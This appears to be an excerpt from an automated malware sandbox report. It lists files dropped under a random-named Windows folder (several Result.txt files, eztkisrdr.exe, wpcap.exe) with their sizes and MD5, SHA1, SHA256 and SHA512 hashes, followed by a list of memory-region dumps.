SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\vieiitfbt\tbntqyuzn\Result.txt

Filesize
504B

MD5
60a6de3b40d48e9fb8e6ecbeb1166841

SHA1
8e34982cdff5e6f796a644a8a690a2876d13e413

SHA256
c5f1028c73d25d2e6e7932acc39dd6c2f414649bb4b15492c7be71953ebd675d

SHA512
b26506b4e99c87462aa534cf80db70dd0b1f69a2cb10e3a9dbf93be959c1c8da35e60aea9aed92417ca671f8732b5f73b2df7d4301cd2fc1d2b8c49042f796c6

Download Submit
C:\Windows\vieiitfbt\tbntqyuzn\Result.txt

Filesize
738B

MD5
494208838ba0c09c1aa40d91cb1a9481

SHA1
66c7ac1ab7b5e5079f6df186e43aec6eeeb31102

SHA256
e025158c8af4fc1f3ddde1dfda0bf3637022f0273ee42d25f766e7f60ca1aa4f

SHA512
b2aec0408a505d2c9bef0c858a072b9c48692148ec659bf0685395ee32c68a0f6e8ab03a5949663c4bdc7efda30d1cdfe8c726f266eabb7e79b10a3ebcc814b1

Download Submit
C:\Windows\vieiitfbt\tbntqyuzn\Result.txt

Filesize
1KB

MD5
fb7c9c25596c54bb03fc19750a879bb6

SHA1
4d614b4a3236e2b9a7e3885a2d961d5dd9ac70d6

SHA256
8fbd1a1b1f07f77ebfb4d3d528cf49d0b4dfe4640789e594238d05484273babc

SHA512
05e758f9346570d3519aaa4722316d0bb7d4e592a8dc681c6376e0888597f7848cfe40802fd6e6734fb8450a490e75a16b38c62b758fd857fc4c60754fafbe6e

Download Submit
C:\Windows\vieiitfbt\tbntqyuzn\Result.txt

Filesize
2KB

MD5
8b9a4eed5f40f2244c059f566d34b81b

SHA1
82c8d2e600e8100b5bb474279f79a45cc6142177

SHA256
f7970ce6fdc92627f9f6f7c688f3c685c2526396a63e5f2f0a47365fa47de2d1

SHA512
aaeb350be2facc0110e1335b6eb0f2bbdaef4c65d803613c724c9be5ec8555879a06e8913a23aec7d952035ce297afef43fb31faa4fd164c6d61a7ee4fe661ad

Download Submit
C:\Windows\vieiitfbt\tbntqyuzn\Result.txt

Filesize
2KB

MD5
6444dfa53cb2148215fa597a52fb7f57

SHA1
e55d3307925c9168d66fbfef72f06c42ca33c2f2

SHA256
426568fc96c96d74cca4f33f73ff2a074c6aa6e7a7c96455fc7f56230f00b771

SHA512
5bb6190066f77290a3f05dcb4f7dfa6243fe8c3421e865a901b4952710dac8fef299cb7cd1aeaca7ddded867ad64876e0029026a40c9e1f76e5711f57b9188fb

Download Submit
C:\Windows\vieiitfbt\tbntqyuzn\Result.txt

Filesize
3KB

MD5
0f7fe6b5533e89cba1bb6bffcffc1bef

SHA1
2da9aac32c2d0f26f7533f3914c4c55efc60c7c0

SHA256
a53e6586c7ddb5ff8ec8f2da7dc0762957c00d09c0b94228ec83a5e968202e96

SHA512
dc8996ccf4c6f59a895e52dbf985eb702f8168122d9c668d6cdf240324789da548a389fe203a14544bfe6435d099043505d78fcf73f5bff46af2fa9c71bb322f

Download Submit
C:\Windows\vieiitfbt\tbntqyuzn\Result.txt

Filesize
3KB

MD5
a64b36ba38fc23b7d999614ae6ad8ad5

SHA1
863b56c2b88b53fe0acb582fd2a2cf631010587e

SHA256
e2d0a2602e0572317fd197abf4758b16f09e177cb6c3b655851dd0a70284c2a5

SHA512
ae033e1256cde7d0e5f7ac88b3e14d7293de7af4eee9b3eb3e89996c01108f6a0ae082a2ff04c8ab6b4caea0ba82c4a1724a3aa437a6f9107393143e8faf6613

Download Submit
C:\Windows\vieiitfbt\tbntqyuzn\Result.txt

Filesize
3KB

MD5
88d1392b78f247ce2f46de2302c941a9

SHA1
925fec26a02e212be09d4ff008fd464821f6a323

SHA256
fb7f757278317f85def9ab54fa08c0c2cf1ec630ecb9cb3d52f3214cc07bb6a7

SHA512
8359636f9bf6fde2f54a1ff404cf1f9d6666db40db36133f8106c757f83fd90e8a376cc1830d1d097493b7767342e71fe1c12ff21f669bc397dcebe6ef456309

Download Submit
C:\Windows\vieiitfbt\tbntqyuzn\Result.txt

Filesize
4KB

MD5
a0ec831da8a58a0273141c8d1940af68

SHA1
53fc3ab1d33a5e132c4ad62d9def9048554b46a8

SHA256
29ca8e1c40747720e7fc849cd8985d433b96ac9c42cd9aa053a4f86e95c3f119

SHA512
42667bfb19dc1983e66967a013698fc3e6df412fb05cbd48c663dc890d6b204f0e0ce12db22118c1bcf817e64216207bf242d646de457a118d1929c1535de32f

Download Submit
C:\Windows\vieiitfbt\tbntqyuzn\eztkisrdr.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\vieiitfbt\tbntqyuzn\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
memory/780-175-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/812-206-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/816-216-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/1008-8-0x0000000000400000-0x0000000000AA4000-memory.dmp

Filesize
6.6MB

Download
memory/1408-244-0x0000000000DB0000-0x0000000000DC2000-memory.dmp

Filesize
72KB

Download
memory/1472-180-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/1480-202-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/1488-171-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/1792-211-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/2052-197-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/2412-185-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/2476-0-0x0000000000400000-0x0000000000AA4000-memory.dmp

Filesize
6.6MB

Download
memory/2476-4-0x0000000000400000-0x0000000000AA4000-memory.dmp

Filesize
6.6MB

Download
memory/2824-135-0x00007FF768020000-0x00007FF76810E000-memory.dmp

Filesize
952KB

Download
memory/2824-138-0x00007FF768020000-0x00007FF76810E000-memory.dmp

Filesize
952KB

Download
memory/3216-189-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/3420-221-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/3844-232-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/3928-78-0x0000000001160000-0x00000000011AC000-memory.dmp

Filesize
304KB

Download
memory/3948-229-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/4180-193-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/4328-218-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-164-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-240-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-199-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-213-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-182-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-755-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-177-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-753-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-233-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-498-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-167-0x0000027594CF0000-0x0000027594D00000-memory.dmp

Filesize
64KB

Download
memory/4328-496-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4328-494-0x00007FF61E8A0000-0x00007FF61E9C0000-memory.dmp

Filesize
1.1MB

Download
memory/4756-152-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/4756-169-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4840-146-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download
memory/4840-142-0x00007FF7235D0000-0x00007FF72362B000-memory.dmp

Filesize
364KB

Download